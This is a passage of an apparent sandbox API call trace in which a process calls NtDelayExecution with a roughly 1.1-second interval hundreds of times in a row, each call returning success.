(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.991] NtDelayExecution 